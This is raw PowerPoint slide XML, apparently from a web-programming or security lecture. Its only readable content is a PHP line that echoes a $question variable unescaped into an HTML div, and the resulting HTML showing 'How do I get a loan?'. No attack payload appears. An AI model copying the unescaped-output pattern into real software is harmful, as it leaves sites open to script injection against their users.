              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="object 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2304289" y="1331942"/>
            <a:ext cx="5651500" cy="230293"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4238625" h="172719">
                <a:moveTo>
                  <a:pt x="4238244" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4238244" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238244" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238244" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FEFCF5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="object 90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2304289" y="1331941"/>
            <a:ext cx="5651500" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="123610">
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="67" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&lt;div</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="93" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>class=’question'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/div&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="object 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7955279" y="1331942"/>
            <a:ext cx="246380" cy="230293"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="184785" h="172719">
                <a:moveTo>
                  <a:pt x="184403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184403" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184403" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="object 92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7938346" y="1280470"/>
            <a:ext cx="277705" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="object 93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833121" y="1728199"/>
            <a:ext cx="6017260" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTML Code:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;div</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>’question'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>”How</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="27" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="object 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833120" y="1976103"/>
            <a:ext cx="1473200" cy="230293"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1104900" h="172719">
                <a:moveTo>
                  <a:pt x="1104900" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="643128" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="551688" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="551688" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="643128" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1104900" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1104900" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="object 95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="816187" y="1924633"/>
            <a:ext cx="1505373" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>loan?”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="object 96"/>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0144" y="1135888"/>
            <a:ext cx="8449733" cy="1044787"/>
            <a:chOff x="292608" y="851916"/>
            <a:chExt cx="6337300" cy="783590"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="292608" y="851916"/>
              <a:ext cx="6336791" cy="783335"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="337794" y="878078"/>
              <a:ext cx="6242373" cy="688949"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="337794" y="878078"/>
              <a:ext cx="6242685" cy="688975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6242684" h="688975">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6242380" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6242380" y="688949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="688949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="4A7EBB"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8278784" y="1245717"/>
            <a:ext cx="3605107" cy="3371427"/>
            <a:chOff x="6209088" y="934288"/>
            <a:chExt cx="2703830" cy="2528570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>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8" name="object 8"/>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9" name="object 9"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7052068" y="940473"/>
              <a:ext cx="683679" cy="683677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7712913" y="944714"/>
              <a:ext cx="1157358" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7706702" y="939050"/>
              <a:ext cx="1167130" cy="795655"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1167129"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12" name="object 12"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7674864" y="1062228"/>
              <a:ext cx="1237475" cy="729992"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7720304" y="1084795"/>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14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7720304" y="1084795"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1" y="2834199"/>
            <a:ext cx="7448127" cy="2652607"/>
            <a:chOff x="0" y="2125649"/>
            <a:chExt cx="5586095" cy="1989455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1743270" y="2646345"/>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17" name="object 17"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1762756" y="3096107"/>
              <a:ext cx="3707129" cy="1000125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3707129" h="1000125">
                  <a:moveTo>
                    <a:pt x="3706710" y="999642"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38099">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="object 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1762757" y="3061491"/>
              <a:ext cx="128270" cy="128905"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="128269" h="128905">
                  <a:moveTo>
                    <a:pt x="92989" y="128752"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="34607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127711" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2131834"/>
              <a:ext cx="683015" cy="683677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="660175" y="2136076"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>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3" name="object 23"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="621791" y="2253995"/>
              <a:ext cx="1237487" cy="729983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="object 24"/>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5" name="object 25"/>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26" name="object 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833120" y="1331942"/>
            <a:ext cx="1227667" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-80" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CODE:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2060448" y="1331942"/>
            <a:ext cx="260773" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2304289" y="1331942"/>
            <a:ext cx="5651500" cy="230293"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4238625" h="172719">
                <a:moveTo>
                  <a:pt x="4238244" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4238244" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238244" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238244" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FEFCF5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
